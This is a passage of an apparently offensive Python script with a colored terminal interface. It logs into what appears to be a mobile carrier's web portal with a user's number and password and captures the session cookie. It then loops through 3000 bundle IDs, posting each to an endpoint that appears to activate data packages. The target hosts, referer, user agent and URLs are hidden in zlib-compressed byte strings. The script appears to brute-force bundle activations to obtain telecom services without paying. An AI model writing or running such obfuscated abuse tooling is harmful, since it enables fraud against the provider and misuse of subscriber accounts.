xHkKKl1iG2sjUSgVLzLjPiesnc6rFrROSaSfUiwG5paEkhgfi2ISnFKV50jsIfIOm%2BEu%2FJ1ZO%2F48TZlVgd5BHsa2e%2BSqyQZ3pZU2uYQGPnNrdGR%2FR0IoKixPHTZMj9xS9cHJpBCpALn1dxj1XWRv%2FkH4%2BJWIRXPkUZ0ygoCtCcW%2BVBOaOReGWdkKqcAbBAKxaVW6xSCQ%2F9FDRsLk4zM%2BkuEE%2BgOvWPZKoxbnOpGKMcpeyJemtu8jTY2g9UraqpxYGITSQMmImUtdxmOdKvhX85mkZI4FNj1a5wx0sT4qeO0qE5St%2BsPl1%2F5o5%2BJjxxd34p0kbflMlZ7HFNcOV9AURJHbq9jOsRpuw%2FAt%2FSzw%2FAVWlEUYckaIWlA6xGKwO54TLlaW4M9ciuMRhLnSAufFDLKMJFTAkP4C37f3D5cSzb6zyCw5NF3tDjpGSOdUceqC9l3n91xC0jsoAPhhRCUfr1vWnJulsUA%2B%2Fjn72fehe4%2BZx05dJtLVuTXg943el9E0n2bRNiqYuqcpfpehme2zVu7hsHwCief2%2BaczxeYvCuyvyCMUxfWvsfZ7O6gx80kiIhDvRnRAwbjY7YL4IWqQZYJlFbXX04j5E1drsMx%2FNMYzxu48jClshbk9w5sC1vPn%2FWw6q1rQ8Gr3xxNNPjfRYhdu2vNAWjSpnkG60LZN2Jj41Z6g%2B9ppRWMjm2ADWcwCIYpyanbxyCvwDCt60tgQuElOZeo02jqO2rf8%2BvN%2FbC2LbR23uwf1Iid6gD%2FUFTFxJ0q2W9aupgPqjCNNRNXYOxWGolpRZmLvvp0b2UWG0n6BShQQObHEvjeSWYBjbdoto%2Fs3tsCXSevYrQhDLMO8bhQY4NVtkC9qvMWax5XA05f9awb6vSyG3qzCHAkoL00GDOvA8xFir0L27zkLWT5w7TkZ2mw9gEmlGY2j4VfYPiHW%2BNrJLpq8AGdvylT2NSIgvd4yHzpejRabulZ0426cDI%3D&__VIEWSTATEGENERATOR=BAB98CB3&__VIEWSTATEENCRYPTED=&ctl00%24OrangeMenu%24SearchBox%24txtSearch=&ctl00%24ctl41%24g_210c0974_a6ed_4185_9b50_0d80ff948d60%24ctl00%24rdBtnGroup=rdUserLogin&ctl00%24ctl41%24g_210c0974_a6ed_4185_9b50_0d80ff948d60%24ctl00%24txtDialNumber='+pnum+'&ctl00%24ctl41%24g_210c0974_a6ed_4185_9b50_0d80ff948d60%24ctl00%24txtPassword='+ppass+'&ctl00%24ctl41%24g_210c0974_a6ed_4185_9b50_0d80ff948d60%24ctl00%24GSM_Portal_Login_btnLogin=%D8%AA%D8%B3%D8%AC%D9%8A%D9%84+%D8%A7%D9%84%D8%AF%D8%AE%D9%88%D9%84&ctl00%24ctl41%24g_210c0974_a6ed_4185_9b50_0d80ff948d60%24ctl00%24txtRegisterDial='



sess=requests.session()
sess.headers=lhd
req=(sess.post(url,headers=lhd,data=data,allow_redirects=False))


#print(req)
#print(req.url)

try:
	lgd=(req.headers["Set-cookie"])
except:
	print("Error")
	exit()

cl=(len(lgd))

if(not cl>=1000):
	print(red+"••Err number or password ! "+white)
	exit()




new=""
for se in lgd:
	if( "," in se ):
		new = lgd.replace(",","")

lgd=new






subhd={'Host': d1(d2(b'x\x9cK1N1\xf6\xc9\xb5\xac\x8c\x0c7\xcd\x8b\n6\xcd\x89*\xb7\xb5\x05\x00DJ\x06\x86')), 'Connection': 'keep-alive', 'Content-Length': '70', 'User-Agent': d1(d2(b"x\x9c\r\x8e\xcb\x12\x82 \x00E\xbfIc\x9a\\\xb4\x10\xdf\x058\n#\xca\x0eZ`\x8aMc\x19\xe2\xd7\xc7\xf2,\xee\xb9\x87\xf1\xe8,\xf9\xfe\x19\xe8%@S\xac\xef\xd9\xfeV\xaf\x0e\xd4\x0eB\xb5\xb4N\x85f\xae\xd2\xccz\xa6\x82\xb7_Ic\xd0\xd0Y7=\xb4\xaa\xe8z\xc1oH\xf6\xcd\x8f0|B\x13\x0e\xabdD4o\tK\xacV\x85Y\x05\x85\xa5\xe0dU\xceo\xc2\xd1\xfb\x02\x83\x0e\r\xfc\xd7FR\xecH\x02\xf6:\xcd4\xe3\xd1\xd3w\x98*'\xa3Xr'}\x0f>\x1e\x1b>\x86\xeb\x1f\xdf\x0b7\xb4")), 'Content-Type': 'application/json', 'Origin': d1(d2(b'x\x9cK\xf4\x082H\xf6\xf05\xf3\xa9\xb44N1N.M2\xf6\xcaH\xcaM\xc9\xf1\xc9\r\xcb\x03\x00\x80m\t]')), 'Referer': d1(d2(b'x\x9cK\xf4\x082H\xf6\xf05\xf3\xa9\xb44N1N.M2\xf6\xcaH\xcaM\xc9\xf1\xc9\r\xcb\xf31r\xab\xf4124\x8d\x0c\xf7\xcbJ2\x0e+Mq\xb6,H\xca\x0b\xcaI\xce5\xcdIq\xb4\xb5\x05\x00Q\xf4\x13\xb4')), d1(d2(b'x\x9c\x0b4\xb2,K4\xca\xc9\x01\x00\n\xf0\x02\x9e')):cta+lgd}






#print(subhd)










def add(msg , co):
	data='{"Language":"en","BucketId":"'+co+'","BucketName":"1LE daily=50MBs Social"}'
	url=d1(d2(b'x\x9c\r\xcaA\x0b@0\x14\x00\xe0\xbf\xf4X\x94\x83\x0b\x85\xf4L\xa6\xe6\xd9\xcd\xb6\x03\xda$\xb5\x95\x7f\xcfw\xfe\xb6N\x80\xe9\x86\x1c\xdf\x82Yf\x82f\xfd\xae\xbdu\xe8\xe5\x85\xd0L3\rq^2P\xd4\x07ES\\\xa9\xba\x11\\\xb0\xad|\xb5\x97\x80\tO\xd6\x8b\x9f\xc6\xbbCI\x11EZ\x8c\x8aDm\x17\xfe\xfc\xbf\xfc\x00\x05& \x0c'))
	
	res=(sess.post(url,headers=subhd,data=data).text)
	print(res)

	if(not res==""):
			print(cyan+"-"*30)
			print(blue+">"*3+green+" "+msg)
		
			print(cyan+"-"*30)
	else:
		print(res)
		print("Err number or pass ! ")


#print(data)



for tr in range(1,3000):
	
	add(green+"",str(tr))




####################
